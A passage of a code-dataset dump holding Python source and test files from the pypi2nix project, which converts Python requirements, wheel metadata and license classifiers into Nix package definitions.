requirement_set\n\n\ndef test_that_we_can_query_for_added_requirements(requirement_set, requirement_parser):\n requirement = requirement_parser.parse(\"pytest\")\n requirement_set.add(requirement)\n assert requirement_set[requirement.name()] == requirement\n\n\ndef test_that_querying_for_non_existing_requirement_raises_key_error(requirement_set):\n with pytest.raises(KeyError):\n requirement_set[\"non-existing\"]\n\n\ndef test_that_queries_into_set_are_canonicalized(requirement_set, requirement_parser):\n requirement = requirement_parser.parse(\"pytest\")\n requirement_set.add(requirement)\n assert requirement_set[\"PyTest\"] == requirement\n\n\ndef test_that_get_method_returns_none_if_key_not_found(requirement_set):\n assert requirement_set.get(\"not-found\") is None\n\n\ndef test_that_get_method_returns_specified_default_value_when_not_found(\n requirement_set,\n):\n assert requirement_set.get(\"not-found\", 0) == 0\n\n\ndef test_that_filter_works_by_name(requirement_parser, requirement_set):\n requirement = requirement_parser.parse(\"test\")\n requirement_set.add(requirement)\n\n assert len(requirement_set) == 1\n\n filtered_requirement_set = requirement_set.filter(lambda req: req.name() != \"test\")\n\n assert len(filtered_requirement_set) == 0\n\n\ndef test_that_extras_are_preserved_when_converting_to_and_from_a_file(\n requirement_parser: RequirementParser,\n requirement_set: RequirementSet,\n current_platform: TargetPlatform,\n project_dir: str,\n logger: Logger,\n):\n requirement_set.add(requirement_parser.parse(\"req[extra1]\"))\n requirements_file = requirement_set.to_file(\n project_dir, current_platform, requirement_parser, logger\n )\n new_requirements_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n requirement = new_requirements_set[\"req\"]\n assert requirement.extras() == {\"extra1\"}\n" }, { "alpha_fraction": 0.5997419357299805, "alphanum_fraction": 0.6011613011360168, "avg_line_length": 34.227272033691406, "blob_id": "94e08008ecb9f551c6415f391aae0cfe1087cb20", "content_id": "42bdaa68a160f2a968f4a9b35fd734635dfe2eed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7750, "license_type": "no_license", "max_line_length": 87, "num_lines": 220, "path": "/src/pypi2nix/requirements_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import hashlib\nimport os\nimport os.path\nimport tempfile\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Type\nfrom typing import Union\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.sources import Sources\n\nLineHandler = Union[\n \"_RequirementIncludeLineHandler\", \"_EditableLineHandler\", \"_RequirementLineHandler\"\n]\n\n\nclass RequirementsFile:\n def __init__(\n self,\n path: str,\n project_dir: str,\n requirement_parser: RequirementParser,\n logger: Logger,\n ):\n self.project_dir: str = project_dir\n self.original_path: str = path\n self.requirement_parser = requirement_parser\n self._logger = logger\n self._sources = Sources()\n\n @classmethod\n def from_lines(\n constructor: \"Type[RequirementsFile]\",\n lines: List[str],\n project_dir: str,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> \"RequirementsFile\":\n assert not isinstance(lines, str)\n temporary_file_descriptor, temporary_file_path = tempfile.mkstemp(\n dir=project_dir, text=True\n )\n try:\n with open(temporary_file_descriptor, \"w\") as f:\n for line in lines:\n f.write(line)\n f.write(\"\\n\")\n requirements_file = constructor(\n project_dir=project_dir,\n path=temporary_file_path,\n requirement_parser=requirement_parser,\n logger=logger,\n )\n requirements_file.process()\n finally:\n os.remove(temporary_file_path)\n return requirements_file\n\n def read(self) -> str:\n if os.path.exists(self.processed_requirements_file_path()):\n path = self.processed_requirements_file_path()\n else:\n path = self.original_path\n with open(path) as f:\n return f.read()\n\n def process(self) -> None:\n new_requirements_file = self.processed_requirements_file_path()\n\n with open(self.original_path) as original_file, open(\n new_requirements_file, \"w+\"\n ) as new_file:\n for requirements_line in original_file.readlines():\n requirements_line = requirements_line.strip()\n if requirements_line:\n processed_requirements_line = self._process_line(requirements_line)\n print(processed_requirements_line, file=new_file)\n self._logger.debug(f\"Created requirements file {new_requirements_file}\")\n\n def _process_line(self, requirements_line: str) -> str:\n line_handler: LineHandler\n if self.is_include_line(requirements_line):\n line_handler = _RequirementIncludeLineHandler(\n line=requirements_line,\n original_path=self.original_path,\n project_directory=self.project_dir,\n requirement_parser=self.requirement_parser,\n logger=self._logger,\n )\n elif self.is_editable_line(requirements_line):\n line_handler = _EditableLineHandler(\n line=requirements_line,\n original_path=self.original_path,\n requirement_parser=self.requirement_parser,\n )\n else:\n line_handler = _RequirementLineHandler(\n line=requirements_line,\n requirement_parser=self.requirement_parser,\n original_path=self.original_path,\n )\n line, sources = line_handler.process()\n self._sources.update(sources)\n return line\n\n def processed_requirements_file_path(self) -> str:\n return \"%s/%s.txt\" % (\n self.project_dir,\n hashlib.md5(self.original_path.encode()).hexdigest(),\n )\n\n def is_include_line(self, line: str) -> bool:\n return line.startswith(\"-r \") or line.startswith(\"-c \")\n\n def is_vcs_line(self, line: str) -> bool:\n return line.startswith(\"-e git+\") or line.startswith(\"-e hg+\")\n\n def is_editable_line(self, line: str) -> bool:\n return line.startswith(\"-e \") and not self.is_vcs_line(line)\n\n def sources(self) -> Sources:\n return self._sources\n\n\nclass _RequirementIncludeLineHandler:\n def __init__(\n self,\n line: str,\n original_path: str,\n project_directory: str,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> None:\n self._line = line\n self._original_path = original_path\n self._project_directory = project_directory\n self._requirement_parser = requirement_parser\n self._logger = logger\n\n def process(self) -> Tuple[str, Sources]:\n # this includes '-r ' and '-c ' lines\n original_file_path = self._line[2:].strip()\n if os.path.isabs(original_file_path):\n included_file_path = original_file_path\n else:\n included_file_path = os.path.abspath(\n os.path.join(os.path.dirname(self._original_path), original_file_path)\n )\n new_requirements_file = RequirementsFile(\n included_file_path,\n self._project_directory,\n requirement_parser=self._requirement_parser,\n logger=self._logger,\n )\n new_requirements_file.process()\n return (\n self._line[0:3] + new_requirements_file.processed_requirements_file_path(),\n new_requirements_file.sources(),\n )\n\n\nclass _EditableLineHandler:\n def __init__(\n self, line: str, original_path: str, requirement_parser: RequirementParser\n ) -> None:\n self._line = line\n self._original_path = original_path\n self._requirement_parser = requirement_parser\n\n def process(self) -> Tuple[str, Sources]:\n self._strip_editable()\n line_handler = _RequirementLineHandler(\n line=self._line,\n requirement_parser=self._requirement_parser,\n original_path=self._original_path,\n )\n line, sources = line_handler.process()\n return \"-e \" + line, sources\n\n def _strip_editable(self) -> None:\n self._line = self._line[2:].strip()\n\n\nclass _RequirementLineHandler:\n def __init__(\n self, line: str, requirement_parser: RequirementParser, original_path: str\n ) -> None:\n self._line = line\n self._requirement_parser = requirement_parser\n self._original_path = original_path\n self._sources = Sources()\n\n def process(self) -> Tuple[str, Sources]:\n try:\n requirement = self._requirement_parser.parse(self._line)\n except ParsingFailed:\n return self._line, self._sources\n else:\n if isinstance(requirement, PathRequirement):\n requirement = requirement.change_path(\n lambda path: self._update_path(requirement.name(), path)\n )\n return requirement.to_line(), self._sources\n\n def _update_path(self, requirement_name: str, requirement_path: str) -> str:\n if not os.path.isabs(requirement_path):\n requirement_path = os.path.relpath(\n os.path.join(os.path.dirname(self._original_path), requirement_path)\n )\n self._sources.add(requirement_name, PathSource(path=requirement_path))\n if os.path.isabs(requirement_path):\n return requirement_path\n else:\n absolute_path = os.path.abspath(requirement_path)\n return absolute_path\n" }, { "alpha_fraction": 0.6144532561302185, "alphanum_fraction": 0.6303443312644958, "avg_line_length": 46.19643020629883, "blob_id": "55215b74333a38ff321b9c0d4aada053feae2657", "content_id": "4d1902ba515ad93264103023496ea031b2aff485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7929, "license_type": "no_license", "max_line_length": 111, "num_lines": 168, "path": "/src/pypi2nix/license.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import re\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nfrom pypi2nix.nix_language import escape_string\n\nall_classifiers = {\n \"License :: Aladdin Free Public License (AFPL)\": None,\n \"License :: CC0 1.0 Universal (CC0 1.0) Public Domain Dedication\": None,\n \"License :: DFSG approved\": None,\n \"License :: Eiffel Forum License (EFL)\": None,\n \"License :: Free For Educational Use\": None,\n \"License :: Free For Home Use\": None,\n \"License :: Free for non-commercial use\": None,\n \"License :: Freely Distributable\": None,\n \"License :: Free To Use But Restricted\": None,\n \"License :: Freeware\": None,\n \"License :: Netscape Public License (NPL)\": None,\n \"License :: Nokia Open Source License (NOKOS)\": None,\n \"License :: OSI Approved\": None,\n \"License :: OSI Approved :: Academic Free License (AFL)\": \"licenses.afl21\",\n \"License :: OSI Approved :: Apache Software License\": \"licenses.asl20\",\n \"License :: OSI Approved :: Apple Public Source License\": None,\n \"License :: OSI Approved :: Artistic License\": \"licenses.artistic2\",\n \"License :: OSI Approved :: Attribution Assurance License\": None,\n \"License :: OSI Approved :: BSD License\": \"licenses.bsdOriginal\",\n \"License :: OSI Approved :: CEA CNRS Inria Logiciel Libre License, version 2.1 (CeCILL-2.1)\": None,\n \"License :: OSI Approved :: Common Public License\": \"licenses.cpl10\",\n \"License :: OSI Approved :: Eiffel Forum License\": \"licenses.efl20\",\n \"License :: OSI Approved :: European Union Public Licence 1.0 (EUPL 1.0)\": None,\n \"License :: OSI Approved :: European Union Public Licence 1.1 (EUPL 1.1)\": None,\n \"License :: OSI Approved :: GNU Affero General Public License v3\": \"licenses.agpl3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)\": \"licenses.agpl3Plus\",\n \"License :: OSI Approved :: GNU Free Documentation License (FDL)\": \"licenses.fdl13\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\": \"licenses.gpl1\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\": \"licenses.gpl2\",\n \"License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)\": \"licenses.gpl2Plus\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\": \"licenses.gpl3\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\": \"licenses.gpl3Plus\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)\": \"licenses.lgpl2\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)\": \"licenses.lgpl2Plus\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\": \"licenses.lgpl3\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)\": \"licenses.lgpl3Plus\",\n \"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)\": \"licenses.lgpl2\",\n \"License :: OSI Approved :: IBM Public License\": \"licenses.ipl10\",\n \"License :: OSI Approved :: Intel Open Source License\": None,\n \"License :: OSI Approved :: ISC License (ISCL)\": \"licenses.isc\",\n \"License :: OSI Approved :: Jabber Open Source License\": None,\n \"License :: OSI Approved :: MIT License\": \"licenses.mit\",\n \"License :: OSI Approved :: MITRE Collaborative Virtual Workspace License (CVW)\": None,\n \"License :: OSI Approved :: Motosoto License\": None,\n \"License :: OSI Approved :: Mozilla Public License 1.0 (MPL)\": \"licenses.mpl10\",\n \"License :: OSI Approved :: Mozilla Public License 1.1 (MPL 1.1)\": \"licenses.mpl11\",\n \"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)\": \"licenses.mpl20\",\n \"License :: OSI Approved :: Nethack General Public License\": None,\n \"License :: OSI Approved :: Nokia Open Source License\": None,\n \"License :: OSI Approved :: Open Group Test Suite License\": None,\n \"License :: OSI Approved :: Python License (CNRI Python License)\": None,\n \"License :: OSI Approved :: Python Software Foundation License\": \"licenses.psfl\",\n \"License :: OSI Approved :: Qt Public License (QPL)\": None,\n \"License :: OSI Approved :: Ricoh Source Code Public License\": None,\n \"License :: OSI Approved :: Sleepycat License\": \"licenses.sleepycat\",\n \"License :: OSI Approved :: Sun Industry Standards Source License (SISSL)\": None,\n \"License :: OSI Approved :: Sun Public License\": None,\n \"License :: OSI Approved :: University of Illinois/NCSA Open Source License\": \"licenses.ncsa\",\n \"License :: OSI Approved :: Vovida Software License 1.0\": \"licenses.vsl10\",\n \"License :: OSI Approved :: W3C License\": \"licenses.w3c\",\n \"License :: OSI Approved :: X.Net License\": None,\n \"License :: OSI Approved :: zlib/libpng License\": \"licenses.zlib\",\n \"License :: OSI Approved :: Zope Public License\": \"licenses.zpl21\",\n \"License :: Other/Proprietary License\": None,\n \"License :: Public Domain\": \"licenses.publicDomain\",\n \"License :: Repoze Public License\": None,\n}\n\n\ndef escape_regex(text: str) -> str:\n return re.escape(text)\n\n\nLICENSE_PATTERNS: Dict[str, List[str]] = {\n \"licenses.zpl21\": list(\n map(escape_regex, [\"LGPL with exceptions or ZPL\", \"ZPL 2.1\"])\n ),\n \"licenses.bsd3\": list(map(escape_regex, [\"3-Clause BSD License\", \"BSD-3-Clause\"])),\n \"licenses.mit\": list(\n map(\n escape_regex,\n [\n \"MIT\",\n \"MIT License\",\n \"MIT or Apache License, Version 2.0\",\n \"The MIT License\",\n \"Expat license\",\n \"MIT license\",\n ],\n )\n ),\n \"licenses.bsdOriginal\": list(\n map(\n escape_regex,\n [\"BSD\", \"BSD License\", \"BSD-like\", \"BSD or Apache License, Version 2.0\"],\n )\n )\n + [\"BSD -.*\"],\n \"licenses.asl20\": list(\n map(\n escape_regex,\n [\n \"Apache 2.0\",\n \"Apache License 2.0\",\n \"Apache 2\",\n \"Apache License, Version 2.0\",\n \"Apache License Version 2.0\",\n \"http://www.apache.org/licenses/LICENSE-2.0\",\n ],\n )\n ),\n \"licenses.lgpl3\": list(\n map(\n escape_regex,\n [\"GNU Lesser General Public License (LGPL), Version 3\", \"LGPL\"],\n )\n ),\n \"licenses.lgpl3Plus\": list(map(escape_regex, [\"LGPLv3+\"])),\n \"licenses.mpl20\": list(\n map(\n escape_regex,\n [\"MPL2\", \"MPL 2.0\", \"MPL 2.0 (Mozilla Public License)\", \"MPL-2.0\"],\n )\n ),\n \"licenses.psfl\": list(map(escape_regex, [\"Python Software Foundation License\"])),\n \"licenses.gpl2\": list(map(escape_regex, [\"GPL version 2\"])),\n}\n\n\ndef recognized_nix_license_from_classifiers(classifiers: List[str],) -> Optional[str]:\n license_classifiers = [i for i in classifiers if i in all_classifiers]\n for license_classifier in license_classifiers:\n license_nix = all_classifiers[license_classifier]\n if license_nix is not None:\n return license_nix\n return None\n\n\ndef first_license_classifier_from_list(classifiers: List[str]) -> Optional[str]:\n for classifier in classifiers:\n if classifier in all_classifiers:\n escaped_classifier: str = escape_string(classifier)\n return '\"' + escaped_classifier + '\"'\n return None\n\n\ndef license_from_string(license_string: str) -> Optional[str]:\n for nix_license, license_patterns in LICENSE_PATTERNS.items():\n for pattern in license_patterns:\n if re.match(\"^\" + pattern + \"$\", license_string):\n return nix_license\n return None\n\n\ndef find_license(classifiers: List[str], license_string: str) -> Optional[str]:\n return (\n recognized_nix_license_from_classifiers(classifiers)\n or license_from_string(license_string)\n or first_license_classifier_from_list(classifiers)\n )\n" }, { "alpha_fraction": 0.6182460188865662, "alphanum_fraction": 0.6191877722740173, "avg_line_length": 34.8438835144043, "blob_id": "791c9fbed5c94d5a3ead9bc24db82fb655b39384", "content_id": "881304f93a54de0fe4ef89a3fb6ebb3af1c8bb08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8495, "license_type": "no_license", "max_line_length": 105, "num_lines": 237, "path": "/src/pypi2nix/wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import email.parser\nimport os.path\nfrom email.header import Header\nfrom email.message import Message\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport click\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.license import find_license\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix_language import escape_string\nfrom pypi2nix.package import HasBuildDependencies\nfrom pypi2nix.package import HasRuntimeDependencies\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass Wheel(HasRuntimeDependencies, HasBuildDependencies):\n def __init__(\n self,\n name: str,\n version: str,\n deps: RequirementSet,\n homepage: str,\n license: str,\n description: str,\n build_dependencies: RequirementSet,\n target_platform: TargetPlatform,\n ):\n self.name = canonicalize_name(name)\n self.version = version\n self._deps = deps\n self.homepage = homepage\n self.license = license\n self.description = description\n self._build_dependencies: RequirementSet = build_dependencies\n self._target_platform = target_platform\n self.package_format: str = \"setuptools\"\n\n def to_dict(self) -> Dict[str, Any]:\n return {\n \"name\": self.name,\n \"version\": self.version,\n \"deps\": [requirement.name() for requirement in self._deps],\n \"homepage\": self.homepage,\n \"license\": self.license,\n \"description\": self.description,\n \"build_dependencies\": [\n requirement.name() for requirement in self._build_dependencies\n ],\n }\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n if target_platform != self._target_platform:\n return RequirementSet(target_platform)\n else:\n return self._build_dependencies\n\n def runtime_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n if target_platform != self._target_platform:\n return RequirementSet(target_platform)\n else:\n return self.dependencies([])\n\n def dependencies(self, extras: List[str] = []) -> RequirementSet:\n return self._deps.filter(\n lambda requirement: requirement.applies_to_target(\n self._target_platform, extras=extras\n )\n )\n\n def add_build_dependencies(self, dependencies: RequirementSet) -> None:\n self._build_dependencies += dependencies\n\n @classmethod\n def from_wheel_directory_path(\n wheel_class,\n wheel_directory_path: str,\n target_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> \"Wheel\":\n builder = Builder(\n target_platform, wheel_directory_path, logger, requirement_parser\n )\n return builder.build()\n\n def target_platform(self) -> TargetPlatform:\n return self._target_platform\n\n\nclass Builder:\n def __init__(\n self,\n target_platform: TargetPlatform,\n wheel_directory_path: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> None:\n self.name: Optional[str] = None\n self.version: Optional[str] = None\n self.target_platform = target_platform\n self.runtime_dependencies: RequirementSet = RequirementSet(target_platform)\n self.homepage: Optional[str] = None\n self.license: Optional[str] = None\n self.description: Optional[str] = None\n self.build_dependencies = RequirementSet(target_platform)\n self.wheel_directory_path: str = wheel_directory_path\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.pkg_info: Message = self._parse_pkg_info()\n\n def build(self) -> \"Wheel\":\n self._get_name()\n self._get_version()\n self._get_runtime_dependencies()\n self._get_homepage()\n self._get_license()\n self._get_description()\n return self._verify_integrity()\n\n def _verify_integrity(self) -> \"Wheel\":\n if self.version is None:\n raise Exception(\n f\"Could not extract version from wheel metadata for `{self.name}`\"\n )\n if self.name is None:\n raise Exception(\n f\"Could not extract name info from metadata for package at `{self.wheel_directory_path}`\"\n )\n if self.homepage is None:\n raise Exception(\n f\"Could not extract homepage information from metadata for package `{self.name}`\"\n )\n if self.license is None:\n raise Exception(\n f\"Could not extract license information from metadata for package `{self.name}`\"\n )\n if self.description is None:\n raise Exception(\n f\"Could not extract description from metadata for package `{self.name}`\"\n )\n return Wheel(\n name=self.name,\n version=self.version,\n target_platform=self.target_platform,\n deps=self.runtime_dependencies,\n build_dependencies=self.build_dependencies,\n homepage=self.homepage,\n license=self.license,\n description=self.description,\n )\n\n def _parse_pkg_info(self) -> Message:\n metadata_file = os.path.join(self.wheel_directory_path, \"METADATA\")\n if os.path.exists(metadata_file):\n with open(\n metadata_file, \"r\", encoding=\"ascii\", errors=\"surrogateescape\"\n ) as headers:\n return email.parser.Parser().parse(headers)\n else:\n raise click.ClickException(\n f\"Unable to find METADATA in `{self.wheel_directory_path}` folder.\"\n )\n\n def _get_name(self) -> None:\n self.name = str_from_message(self.pkg_info, \"name\")\n if self.name is None:\n raise Exception(\n f\"Could not extract name from wheel metadata at {self.wheel_directory_path}\"\n )\n self.name = canonicalize_name(self.name)\n\n def _get_version(self) -> None:\n self.version = str_from_message(self.pkg_info, \"version\")\n\n def _get_license(self) -> None:\n license_string = str_from_message(self.pkg_info, \"license\")\n if license_string is None:\n license_string = \"\"\n classifiers = list_from_message(self.pkg_info, \"Classifier\")\n if classifiers is None:\n classifiers = []\n self.license = find_license(\n classifiers=classifiers, license_string=license_string\n )\n\n if self.license is None:\n self.license = '\"' + escape_string(license_string) + '\"'\n self.logger.warning(\n f\"Couldn't recognize license `{license_string}` for `{self.name}`\"\n )\n\n def _get_description(self) -> None:\n self.description = str_from_message(self.pkg_info, \"summary\")\n if self.description is None:\n self.description = \"\"\n\n def _get_runtime_dependencies(self) -> None:\n dependencies = list_from_message(self.pkg_info, \"requires-dist\")\n if dependencies is None:\n dependencies = []\n for dep_string in dependencies:\n dependency = self.requirement_parser.parse(dep_string)\n if not self._is_valid_dependency(dependency.name()):\n continue\n self.runtime_dependencies.add(dependency)\n\n def _is_valid_dependency(self, dependency_name: str) -> bool:\n canonicalized_dependency = canonicalize_name(dependency_name)\n return canonicalized_dependency != self.name\n\n def _get_homepage(self) -> None:\n self.homepage = str_from_message(self.pkg_info, \"home-page\")\n if not self.homepage:\n self.homepage = \"\"\n\n\ndef str_from_message(metadata: Message, key: str) -> Optional[str]:\n maybe_value = metadata.get(key)\n if isinstance(maybe_value, str):\n return maybe_value\n else:\n return None\n\n\ndef list_from_message(metadata: Message, key: str) -> Optional[List[str]]:\n maybe_value = metadata.get_all(key)\n if isinstance(maybe_value, list):\n return [str(item) if isinstance(item, Header) else item for item in maybe_value]\n else:\n return None\n" }, { "alpha_fraction": 0.6496945023536682, "alphanum_fraction": 0.6496945023536682, "avg_line_length": 27.882352828979492, "blob_id": "00ba04b567856d44cc2bf03f2079335a8294a4a4", "content_id": "9911de0628b5ed8d35fe31a8362d9f569ba551a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 491, "license_type": "no_license", "max_line_length": 64, "num_lines": 17, "path": "/src/pypi2nix/memoize.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from functools import wraps\nfrom typing import Callable\nfrom typing import TypeVar\n\nS = TypeVar(\"S\")\nT = TypeVar(\"T\")\n\n\ndef memoize(method: Callable[[S], T]) -> Callable[[S], T]:\n @wraps(method)\n def wrapped_method(self: S) -> T:\n attribute_name = \"_memoize_attribute_\" + method.__name__\n if not hasattr(self, attribute_name):\n setattr(self, attribute_name, method(self))\n return getattr(self, attribute_name) # type: ignore\n\n return wrapped_method\n" }, { "alpha_fraction": 0.7162403464317322, "alphanum_fraction": 0.7183224558830261, "avg_line_length": 30.420560836791992, "blob_id": "a365d30a479f5a2dacbd16681b98096953adc917", "content_id": "a5b31b91673a93f073ea4d5976d64a9229223485", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3362, "license_type": "permissive", "max_line_length": 82, "num_lines": 107, "path": "/unittests/pip/test_virtualenv_pip.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport venv\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import PipFailed\nfrom pypi2nix.pip import VirtualenvPip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@pytest.fixture\ndef pip_without_index(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n wheel_distribution_archive_path: str,\n requirement_parser: RequirementParser,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\n@pytest.fixture\ndef pip_from_data_directory(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n wheel_distribution_archive_path: str,\n data_directory: str,\n requirement_parser: RequirementParser,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n find_links=[data_directory],\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\ndef test_pip_without_index_cannot_download_six(\n pip_without_index: VirtualenvPip,\n download_dir: Path,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n) -> None:\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n with pytest.raises(PipFailed):\n pip_without_index.download_sources(requirements, download_dir)\n\n\ndef test_pip_without_index_cannot_be_prepared_without_wheel_supplied(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n requirement_parser: RequirementParser,\n) -> None:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n requirement_parser=requirement_parser,\n )\n with pytest.raises(PipFailed):\n pip.prepare_virtualenv()\n\n\ndef test_pip_with_data_directory_index_can_download_six(\n pip_from_data_directory: VirtualenvPip,\n download_dir: Path,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n) -> None:\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip_from_data_directory.download_sources(requirements, download_dir)\n\n\ndef test_that_set_environment_variable_undoes_changes_when_exiting(\n pip_without_index: VirtualenvPip,\n):\n old_environment = dict(os.environ)\n with pip_without_index._set_environment_variable({\"test\": \"definitly_unset\"}):\n pass\n assert dict(os.environ) == old_environment\n" }, { "alpha_fraction": 0.7635468244552612, "alphanum_fraction": 0.7668308615684509, "avg_line_length": 25.478260040283203, "blob_id": "827e7c8eb95c8f94aec2252260c577e95fa4049f", "content_id": "89e0edb200cad65d50ebcaa19dded25dcfd4f1b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 609, "license_type": "no_license", "max_line_length": 86, "num_lines": 23, "path": "/src/pypi2nix/package/interfaces.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from abc import ABCMeta\nfrom abc import abstractmethod\n\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass HasBuildDependencies(metaclass=ABCMeta):\n @abstractmethod\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n pass\n\n\nclass HasRuntimeDependencies(metaclass=ABCMeta):\n @abstractmethod\n def runtime_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n pass\n\n\nclass HasPackageName(metaclass=ABCMeta):\n @abstractmethod\n def package_name(self) -> str:\n pass\n" }, { "alpha_fraction": 0.6573795080184937, "alphanum_fraction": 0.6612700819969177, "avg_line_length": 30.247058868408203, "blob_id": "fa5d6e74545d99f4f254a030c40f2dd50e10ad5e", "content_id": "c7763c0e1c4314085dc9ea1af6b9e35c9023f4cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7968, "license_type": "no_license", "max_line_length": 111, "num_lines": 255, "path": "/src/pypi2nix/cli.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom typing import List\nfrom typing import Optional\n\nimport click\n\nfrom pypi2nix.configuration import ApplicationConfiguration\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import verbosity_from_int\nfrom pypi2nix.main import Pypi2nix\nfrom pypi2nix.network_file import NetworkFile\nfrom pypi2nix.overrides import FILE_URL\nfrom pypi2nix.overrides import Overrides\nfrom pypi2nix.overrides import OverridesGithub\nfrom pypi2nix.overrides import OverridesNetworkFile\nfrom pypi2nix.path import Path\nfrom pypi2nix.project_directory import PersistentProjectDirectory\nfrom pypi2nix.project_directory import ProjectDirectory\nfrom pypi2nix.project_directory import TemporaryProjectDirectory\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.python_version import available_python_versions\nfrom pypi2nix.utils import args_as_list\nfrom pypi2nix.version import pypi2nix_version\n\n\n@click.command(\"pypi2nix\")\n@click.option(\"--version\", is_flag=True, help=\"Show version of pypi2nix\")\n@click.option(\"-v\", \"--verbose\", count=True)\n@click.option(\"-q\", \"--quiet\", count=True)\n@click.option(\n \"-I\",\n \"--nix-path\",\n multiple=True,\n default=None,\n help=\"Add a path to the Nix expression search path. This \"\n \"option may be given multiple times. See the NIX_PATH \"\n \"environment variable for information on the semantics \"\n \"of the Nix search path. Paths added through -I take \"\n \"precedence over NIX_PATH.\",\n)\n@click.option(\n \"--nix-shell\", required=False, default=None, help=\"Path to nix-shell executable.\"\n)\n@click.option(\n \"--basename\",\n required=False,\n default=\"requirements\",\n help=\"Basename which is used to generate files. By default \"\n \"it uses basename of provided file.\",\n)\n@click.option(\n \"-E\",\n \"--extra-build-inputs\",\n multiple=True,\n default=None,\n help=\"Extra build dependencies needed for installation of \"\n \"required python packages.\",\n)\n@click.option(\n \"--emit-extra-build-inputs/--no-emit-extra-build-inputs\",\n default=True,\n help=\"Put extra build dependencies (specified using -E) in generated output.\",\n)\n@click.option(\n \"-N\",\n \"--extra-env\",\n default=\"\",\n help=\"Extra environment variables needed for installation of \"\n \"required python packages.\"\n 'Example: \"LANG=en_US.UTF-8 FOO_OPTS=xyz\"',\n)\n@click.option(\n \"-T\", \"--enable-tests\", 